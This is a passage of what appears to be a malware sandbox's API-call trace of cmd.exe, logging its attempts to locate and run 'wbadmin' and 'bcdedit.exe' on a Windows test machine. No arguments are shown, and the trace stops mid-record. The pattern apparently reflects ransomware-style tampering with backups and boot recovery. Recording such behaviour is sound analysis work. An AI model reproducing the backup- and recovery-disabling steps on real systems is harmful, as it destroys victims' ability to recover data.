(_String1="wbadmin", _String2="RENAME") returned 5 [0161.594] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0161.594] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0161.594] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0161.595] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0161.595] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0161.595] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0161.595] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0161.595] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0161.595] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0161.595] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0161.595] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0161.595] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0161.595] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0161.595] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0161.595] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0161.595] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0161.595] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0161.595] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0161.595] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0161.595] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0161.595] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0161.595] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0161.595] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0161.595] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0161.595] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0161.595] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0161.595] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0161.595] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0161.595] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0161.595] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0161.595] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0161.595] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0161.595] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0161.595] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0161.595] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0161.596] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0161.596] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0161.596] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0161.596] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0161.596] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0161.596] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0161.596] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0161.596] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0161.596] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0161.596] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0161.596] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0161.596] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0161.596] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0161.596] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0161.596] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0161.596] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0161.596] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0161.596] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0161.596] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0161.596] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0161.596] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0161.596] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0161.596] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0161.596] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0161.596] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0161.596] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0161.596] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0161.596] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0161.596] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0161.596] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0161.596] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0161.596] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0161.596] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0161.597] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0161.597] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0161.597] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0161.597] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0161.597] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0161.597] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0161.597] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0161.597] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0161.597] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0161.597] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0161.597] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0161.597] ??_V@YAXPAX@Z () returned 0x1 [0161.597] GetProcessHeap () returned 0xaa0000 [0161.597] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xffd6) returned 0xab9a60 [0161.598] GetProcessHeap () returned 0xaa0000 [0161.598] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x4e) returned 0xaa4640 [0161.598] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0161.599] malloc (_Size=0xffce) returned 0xbc26d8 [0161.599] ??_V@YAXPAX@Z () returned 0x6ff374 [0161.599] GetProcessHeap () returned 0xaa0000 [0161.599] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x1ffa4) returned 0xac9a40 [0161.601] SetErrorMode (uMode=0x0) returned 0x0 [0161.601] SetErrorMode (uMode=0x1) returned 0x0 [0161.601] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0xac9a48, lpFilePart=0x6ff394 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x6ff394*="Desktop") returned 0x17 [0161.601] SetErrorMode (uMode=0x0) returned 0x1 [0161.602] GetProcessHeap () returned 0xaa0000 [0161.602] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xac9a40, Size=0x48) returned 0xac9a40 [0161.602] GetProcessHeap () returned 0xaa0000 [0161.602] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xac9a40) returned 0x48 [0161.602] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0161.602] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0161.602] GetProcessHeap () returned 0xaa0000 [0161.602] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x1b4) returned 0xaa0e60 [0161.602] GetProcessHeap () returned 0xaa0000 [0161.602] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x360) returned 0xaa1230 [0161.602] GetProcessHeap () returned 0xaa0000 [0161.602] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xaa1230, Size=0x1b6) returned 0xaa1230 [0161.602] GetProcessHeap () returned 0xaa0000 [0161.602] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xaa1230) returned 0x1b6 [0161.602] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0161.602] GetProcessHeap () returned 0xaa0000 [0161.602] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xe0) returned 0xaa13f0 [0161.602] GetProcessHeap () returned 0xaa0000 [0161.602] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xaa13f0, Size=0x76) returned 0xaa13f0 [0161.602] GetProcessHeap () returned 0xaa0000 [0161.602] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xaa13f0) returned 0x76 [0161.602] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.603] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x6ff120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff120) returned 0xffffffff [0161.603] GetLastError () returned 0x2 [0161.603] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.603] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x6ff120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff120) returned 0xffffffff [0161.604] GetLastError () returned 0x2 [0161.604] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.604] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x6ff120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff120) returned 0xffffffff [0161.604] GetLastError () returned 0x2 [0161.604] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.604] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x6ff120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff120) returned 0xffffffff [0161.604] GetLastError () returned 0x2 [0161.604] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.605] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x6ff120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff120) returned 0xffffffff [0161.605] GetLastError () returned 0x2 [0161.605] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.605] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x6ff120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff120) returned 0xffffffff [0161.608] GetLastError () returned 0x2 [0161.608] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.608] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x6ff120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff120) returned 0xffffffff [0161.609] GetLastError () returned 0x2 [0161.609] ??_V@YAXPAX@Z () returned 0x1 [0161.609] _get_osfhandle (_FileHandle=2) returned 0x94 [0161.609] GetFileType (hFile=0x94) returned 0x2 [0161.609] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0161.609] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x6ff56c | out: lpMode=0x6ff56c) returned 1 [0161.669] _get_osfhandle (_FileHandle=2) returned 0x94 [0161.669] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x94, lpConsoleScreenBufferInfo=0x6ff5bc | out: lpConsoleScreenBufferInfo=0x6ff5bc) returned 1 [0161.697] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xf7b990, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0161.701] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xf7b990, nSize=0x2000, Arguments=0x6ff5ec | out: lpBuffer="'wbadmin' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0161.701] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0xf7b990*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x6ff5a0, lpReserved=0x0 | out: lpBuffer=0xf7b990*, lpNumberOfCharsWritten=0x6ff5a0*=0x62) returned 1 [0161.845] ??_V@YAXPAX@Z () returned 0x1 [0161.845] GetConsoleTitleW (in: lpConsoleTitle=0x6ffa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0161.902] malloc (_Size=0xffce) returned 0xbb2700 [0161.902] ??_V@YAXPAX@Z () returned 0x6ff7dc [0161.902] malloc (_Size=0xffce) returned 0xbc26d8 [0161.902] ??_V@YAXPAX@Z () returned 0x6ff594 [0161.903] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\bcdedit.exe")) returned 0xffffffff [0161.903] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0161.903] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0161.903] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0161.903] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0161.903] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0161.903] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0161.903] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0161.903] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0161.903] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0161.903] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0161.903] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0161.903] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0161.903] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0161.903] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0161.903] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0161.903] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0161.903] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0161.903] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0161.903] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0161.903] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0161.903] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0161.903] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0161.903] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0161.903] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0161.903] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0161.903] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0161.903] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0161.904] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0161.904] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0161.904] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0161.904] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0161.904] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0161.904] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0161.904] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0161.904] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0161.904] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0161.904] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0161.904] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0161.904] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0161.904] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0161.904] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0161.904] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0161.904] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0161.904] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0161.904] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0161.904] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0161.904] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0161.904] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0161.904] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0161.904] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0161.904] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0161.904] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0161.904] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0161.904] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0161.904] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0161.904] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0161.904] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0161.904] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0161.904] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0161.904] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0161.904] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0161.905] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0161.905] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0161.905] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0161.905] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0161.905] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0161.905] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0161.905] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0161.905] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0161.905] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0161.905] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0161.905] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0161.905] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0161.905] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0161.905] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0161.905] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0161.905] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0161.905] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0161.905] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0161.905] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0161.905] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0161.905] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0161.905] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0161.905] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0161.905] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0161.905] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0161.905] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0161.905] ??_V@YAXPAX@Z () returned 0x1 [0161.905] GetProcessHeap () returned 0xaa0000 [0161.905] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xffd6) returned 0xac9a90 [0161.905] GetProcessHeap () returned 0xaa0000 [0161.905] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x8c) returned 0xaa1020 [0161.905] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0161.906] malloc (_Size=0xffce) returned 0xbc26d8 [0161.906] ??_V@YAXPAX@Z () returned 0x6ff314 [0161.906] GetProcessHeap () returned 0xaa0000 [0161.906] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x1ffa4) returned 0xad9a70 [0161.906] SetErrorMode (uMode=0x0) returned 0x0 [0161.907] SetErrorMode (uMode=0x1) returned 0x0 [0161.907] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0xad9a78, lpFilePart=0x6ff334 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x6ff334*="Desktop") returned 0x17 [0161.907] SetErrorMode (uMode=0x0) returned 0x1 [0161.907] GetProcessHeap () returned 0xaa0000 [0161.907] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xad9a70, Size=0x50) returned 0xad9a70 [0161.907] GetProcessHeap () returned 0xaa0000 [0161.907] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xad9a70) returned 0x50 [0161.907] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0161.907] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0161.907] GetProcessHeap () returned 0xaa0000 [0161.907] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x1b4) returned 0xaa72e8 [0161.907] GetProcessHeap () returned 0xaa0000 [0161.907] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x360) returned 0xaa74a8 [0161.907] GetProcessHeap () returned 0xaa0000 [0161.907] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xaa74a8, Size=0x1b6) returned 0xaa74a8 [0161.907] GetProcessHeap () returned 0xaa0000 [0161.907] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xaa74a8) returned 0x1b6 [0161.907] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0161.907] GetProcessHeap () returned 0xaa0000 [0161.907] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xe0) returned 0xaa1470 [0161.907] GetProcessHeap () returned 0xaa0000 [0161.907] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xaa1470, Size=0x76) returned 0xaa1470 [0161.907] GetProcessHeap () returned 0xaa0000 [0161.907] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xaa1470) returned 0x76 [0161.907] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.907] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0161.908] GetLastError () returned 0x2 [0161.908] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0161.908] GetLastError () returned 0x2 [0161.908] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.908] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0161.908] GetLastError () returned 0x2 [0161.908] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0161.908] GetLastError () returned 0x2 [0161.909] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.909] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0161.909] GetLastError () returned 0x2 [0161.909] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0161.909] GetLastError () returned 0x2 [0161.909] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.909] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0161.909] GetLastError () returned 0x2 [0161.909] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0161.909] GetLastError () returned 0x2 [0161.910] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.910] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0161.910] GetLastError () returned 0x2 [0161.910] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0161.910] GetLastError () returned 0x2 [0161.910] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.910] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0161.912] GetLastError () returned 0x2 [0161.912] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0161.914] GetLastError () returned 0x2 [0161.914] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.914] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0161.914] GetLastError () returned 0x2 [0161.914] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 